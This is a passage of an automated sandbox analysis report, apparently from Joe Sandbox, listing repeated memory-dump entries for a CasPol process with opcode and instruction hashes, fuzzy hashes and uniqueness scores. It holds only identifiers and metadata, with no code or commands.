                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 89f0ae6e2763ebc5dcfde2db76e59bd41c5f6d4abed57bf4f69a5532eaa567c6
                                                                                  • Instruction ID: 27d56f8eceb61a831f51b44b8fe1b171cc46b95869d1e2f67079db38ed7010fa
                                                                                  • Opcode Fuzzy Hash: 89f0ae6e2763ebc5dcfde2db76e59bd41c5f6d4abed57bf4f69a5532eaa567c6
                                                                                  • Instruction Fuzzy Hash: 0751F331B003208FCB44EBB4C4A876E77BAAF89259B65856CE106C7344CF35DC4ACB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d834f25ed19c22b234d502c2db0d72a0d15ea151f23324faa0116392bdbf3acf
                                                                                  • Instruction ID: 12b9363f9ddc9bed87a4f569d0c2b644cc12906e840bbab85fa8ec5e461a9a39
                                                                                  • Opcode Fuzzy Hash: d834f25ed19c22b234d502c2db0d72a0d15ea151f23324faa0116392bdbf3acf
                                                                                  • Instruction Fuzzy Hash: 4D81B535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c23106b86393c5a8fdf2f60c4a2c41be4e35096e64ae1405b25344a765703a9a
                                                                                  • Instruction ID: 420639622d4fa2fc5ae498de2132d3ca1ba7d664a15c8d5af6d7e6f82b8ef4ca
                                                                                  • Opcode Fuzzy Hash: c23106b86393c5a8fdf2f60c4a2c41be4e35096e64ae1405b25344a765703a9a
                                                                                  • Instruction Fuzzy Hash: 7B81C535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: acc791e0c15320fe0f3c2dc0ac29d22f157bfbe773e295006f5f3db85219b3e7
                                                                                  • Instruction ID: 49790c581d50dbb3d7d4b5fa542ea41acffecd5ff8205bcec90917051adc8c9f
                                                                                  • Opcode Fuzzy Hash: acc791e0c15320fe0f3c2dc0ac29d22f157bfbe773e295006f5f3db85219b3e7
                                                                                  • Instruction Fuzzy Hash: BB71C335905328CFCBA5EF20D89868AB776BF49315F5081E9D80BA2344CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eb3d33518ae8404839fc25f06a0a40d8dff6eab2b35ed2baad5c7ffe5ac6aacd
                                                                                  • Instruction ID: 65a82b62bda41dac78e4324850d8ddfb9617dd148dc23fd0e96aad44b4b77936
                                                                                  • Opcode Fuzzy Hash: eb3d33518ae8404839fc25f06a0a40d8dff6eab2b35ed2baad5c7ffe5ac6aacd
                                                                                  • Instruction Fuzzy Hash: 9571B435905328CFCBA5EF20D89868AB776BF49315F5081E9D80BA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 23bc029ab014a3c97d79040cbae22adc9af8f8b0b25dfd503fefdceb619b4009
                                                                                  • Instruction ID: 9dafe527c5186ed8f26662b6cfb6530a3cee0a5763e48c7e6563ff979a4dec74
                                                                                  • Opcode Fuzzy Hash: 23bc029ab014a3c97d79040cbae22adc9af8f8b0b25dfd503fefdceb619b4009
                                                                                  • Instruction Fuzzy Hash: D961C435905328CFCBA5EF30D89868AB776BF49315F5081E9D80AA3344CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f509489c61d69f49ca5e8d926cdd0a7178df9bd389b81907c2e239e4db183cb
                                                                                  • Instruction ID: e19a0e6d7a10fe8667e85c0e65ddd47a5aa18425d4803babe23247f44ec70777
                                                                                  • Opcode Fuzzy Hash: 4f509489c61d69f49ca5e8d926cdd0a7178df9bd389b81907c2e239e4db183cb
                                                                                  • Instruction Fuzzy Hash: 60513371D107188FDB54CFA9C884BADBBB1BF48710FA48529E819BB350D774A804CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 30fb497de8342840cb5397b64ac7c434b48d5db96c0374ca15a9aa0f8d287bc2
                                                                                  • Instruction ID: fe3fb0aedb60c25f59649d7e4973791e2ed9f8e382d35d6b39de3075a81ba5c5
                                                                                  • Opcode Fuzzy Hash: 30fb497de8342840cb5397b64ac7c434b48d5db96c0374ca15a9aa0f8d287bc2
                                                                                  • Instruction Fuzzy Hash: 0C5132B1D107188FDB54CFA9C884BADBBB1BF48710FA08129E819BB350D774A804CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  • Opcode Fuzzy Hash: b8a87c9213928a88afedb9802495eaaf0c5da8879f42a6f260096a249137cd3d
                                                                                  • Instruction Fuzzy Hash: 70210A366007614BDB64552DA49633D7697DF82218FA10F3AE04FCB790D794DC848F93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 80eb1f4db14f5fb27f6771c748f944d5ab70cd12a0c02be78aa737c6bd48ba40
                                                                                  • Instruction ID: d124a1346ec8e005e92f333ee17f1cd55449d69e63bd0e8d519458b70a6f1beb
                                                                                  • Opcode Fuzzy Hash: 80eb1f4db14f5fb27f6771c748f944d5ab70cd12a0c02be78aa737c6bd48ba40
                                                                                  • Instruction Fuzzy Hash: 6141DA35901328CFCB65EF20D89868AB775FF4A315F5081E9D84AA3344CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b6abf081f2140893b6b567e5629afcac05a94a929f26ca72b84a82f8da93fc42
                                                                                  • Instruction ID: 5100b49299921651bfe1c2adfdcdcce6bc98ccb4c53320074a2b51e6823ae075
                                                                                  • Opcode Fuzzy Hash: b6abf081f2140893b6b567e5629afcac05a94a929f26ca72b84a82f8da93fc42
                                                                                  • Instruction Fuzzy Hash: 5921CF36E087518FCF819FB4C5850EDBFF1AF4A244716816AD505E7252DB30DC82CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5a44a1b02c7416c1128d0b46cb820feacfb617bafcb2a10e84cbbf77518525ac
                                                                                  • Instruction ID: edd6bd8a301e523dc0c41e02a3c1825a0ac06f80c32fb2525a994fea5b85e2b5
                                                                                  • Opcode Fuzzy Hash: 5a44a1b02c7416c1128d0b46cb820feacfb617bafcb2a10e84cbbf77518525ac
                                                                                  • Instruction Fuzzy Hash: B031D835900328CFCB65EF20D89868AB779BF4A315F5081E9D94AA3344CB359E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 758ea79e44bfe3fe33234ae805a3bf0c233bd6457e3196c79f1ab806c901ff81
                                                                                  • Instruction ID: 575c389bd5b47dae44cf6b5e3f536f81a88d7f203e69a2e10f7530d142f55526
                                                                                  • Opcode Fuzzy Hash: 758ea79e44bfe3fe33234ae805a3bf0c233bd6457e3196c79f1ab806c901ff81
                                                                                  • Instruction Fuzzy Hash: DC21D132A083599FD7028F64D85876E3BA1EB45210F948129E8098B355CB34CCA4DFA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a163e42d76ae343bb4c0ca347632c2b31f82628f1f02743a2c431884725cca13
                                                                                  • Instruction ID: 38f6a5338fd0ee6c2ca3ad36d57b03d4a21450d89c4a0b2e71427e16f7be6678
                                                                                  • Opcode Fuzzy Hash: a163e42d76ae343bb4c0ca347632c2b31f82628f1f02743a2c431884725cca13
                                                                                  • Instruction Fuzzy Hash: 1A31FB35A01328CFCBA5EF20D898689B779FF4A315F5080E9D84AA3344CB359E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52f0df23ed51f0e66bc045176eaaab6f6e15d86ec1960181d7ec3fe223ec8aec
                                                                                  • Instruction ID: c90818c9888cf311604eea751a45dfca62a3cf3e8919e0f2c0eedf462d55544c
                                                                                  • Opcode Fuzzy Hash: 52f0df23ed51f0e66bc045176eaaab6f6e15d86ec1960181d7ec3fe223ec8aec
                                                                                  • Instruction Fuzzy Hash: 9B116B36B093914BDB034368DD156E93BA2DFC5210F4989A6C5C5DB286DB20CC4A8B93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eee63149135b59ac71b7b01128074f1c5f58c97bc0a85d0968f7b760aa116dd9
                                                                                  • Instruction ID: 39911dce5634755aac3c8fa560de8a70e7a11c69142b98302888318d3f193802
                                                                                  • Opcode Fuzzy Hash: eee63149135b59ac71b7b01128074f1c5f58c97bc0a85d0968f7b760aa116dd9
                                                                                  • Instruction Fuzzy Hash: 03118279B003609FCB416BB8848D35D7AF5AF891917144929E946D3344EF34C9868B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f8e1010f89c699c5d222521273b818c210dadc879877a5ca79f2c6eaa44ff2e
                                                                                  • Instruction ID: da2c5da8d3f944190c647ef088f7c613196e02e99336abb70c09fbe03a08d3fd
                                                                                  • Opcode Fuzzy Hash: 6f8e1010f89c699c5d222521273b818c210dadc879877a5ca79f2c6eaa44ff2e
                                                                                  • Instruction Fuzzy Hash: 9921EB35A00328CFCB65EF60D898689B7B9FF4A315F5081E9D44AA3354CB359E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 87de7db24aead93767a95dd6dbe0dc8fd52b072e0d2eca9def7946c37b01371f
                                                                                  • Instruction ID: 54f02440e170a70ab2a65628e43734dbb7599f5f3817447a23be986e4e226a1a
                                                                                  • Opcode Fuzzy Hash: 87de7db24aead93767a95dd6dbe0dc8fd52b072e0d2eca9def7946c37b01371f
                                                                                  • Instruction Fuzzy Hash: 6D118279F003209FCB406BB8848C35E7AF5AF882A1B504929E906D3344EF34D9828B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 219b2c5d2be392c1bb75ca517cc5e03903bb6747e678198b94916c1e8afcaf5b
                                                                                  • Instruction ID: ba9844a5dad953cb4ed32463517846e789ca7d4ef7a68b95b51831fd30b660db
                                                                                  • Opcode Fuzzy Hash: 219b2c5d2be392c1bb75ca517cc5e03903bb6747e678198b94916c1e8afcaf5b
                                                                                  • Instruction Fuzzy Hash: 7301D236626231CFCB01ABB0D48E6ED3BB5BF861593054A95D149CB251EF34C88ACB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3584c106c9ec7b1506ab46353b347b830703ddc66923718aa758235268a3008b
                                                                                  • Instruction ID: cd11797c7ae26844fa51a723becad6e2f25cc7174c538c3b0b92c3bd01b5f369
                                                                                  • Opcode Fuzzy Hash: 3584c106c9ec7b1506ab46353b347b830703ddc66923718aa758235268a3008b
                                                                                  • Instruction Fuzzy Hash: 94210635A00328CFCB65EF60D89868AB779FF4A315F5081E9D84AA3340CB319E85CF06
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75547147df15688183c73b6b09d2974f3ea416ea294ed37d95e21b934d2c4e81
                                                                                  • Instruction ID: 385c07eb0da62a11def5af402f060c5cfe12499e2b2240b6f46433f040850039
                                                                                  • Opcode Fuzzy Hash: 75547147df15688183c73b6b09d2974f3ea416ea294ed37d95e21b934d2c4e81
                                                                                  • Instruction Fuzzy Hash: 3611D235A00328CFCB65EF60D89868AB779FF46305F5081EAD94AA3340CB319E85CF42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca15b753e28b8432ce671ff25814f13c948caf61a21a5d5eca6f2e524fab5d9b
                                                                                  • Instruction ID: d2cd9d6c855633715cee8db41fc3f480e8520dffb1128621ab73aae3eba4d0f3
                                                                                  • Opcode Fuzzy Hash: ca15b753e28b8432ce671ff25814f13c948caf61a21a5d5eca6f2e524fab5d9b
                                                                                  • Instruction Fuzzy Hash: 3F01F77190821ACFC701DFA0DE8249DB7B6FF81310B90C656C5558F2D5E7309947C792
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 44449939b60d9de1ffc67e373b726494b835e58fcb459f29d6031bfd946dc2a3
                                                                                  • Instruction ID: a25fda29e00b4bbdcb2d92432711aefc57064b4ce92c658d6957a656792bdd53
                                                                                  • Opcode Fuzzy Hash: 44449939b60d9de1ffc67e373b726494b835e58fcb459f29d6031bfd946dc2a3
                                                                                  • Instruction Fuzzy Hash: 4201B035A01228CFCBA5EF60D8986CAB779BF46315F1081E9D90AA3340CB319A85CF42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 82e55e0b74922948448e42d05d48b04b28b54925a7286f239031e7881e7792a5
                                                                                  • Instruction ID: 3a32cc22067d54557c0393f64697e61e5b70ff1736b1cb2ccaf31e00e79283c7
                                                                                  • Opcode Fuzzy Hash: 82e55e0b74922948448e42d05d48b04b28b54925a7286f239031e7881e7792a5
                                                                                  • Instruction Fuzzy Hash: C9F0A032B40224CBCB149B7094783AD73B6FB84329F208468E502CB384DF76CC12CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e80bee449e7cae294048fdd7964daa27ad40b709798e693c914c3f95ce4e4157
                                                                                  • Instruction ID: 69f8e4474482c8844fd4d8349838c75c54df40733cf3ab630293ae6561aee892
                                                                                  • Opcode Fuzzy Hash: e80bee449e7cae294048fdd7964daa27ad40b709798e693c914c3f95ce4e4157
                                                                                  • Instruction Fuzzy Hash: A9F01435A00228CFCB64DF60D8886C9B774FF45305F2081EAD90AA3340CB319E84CF52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
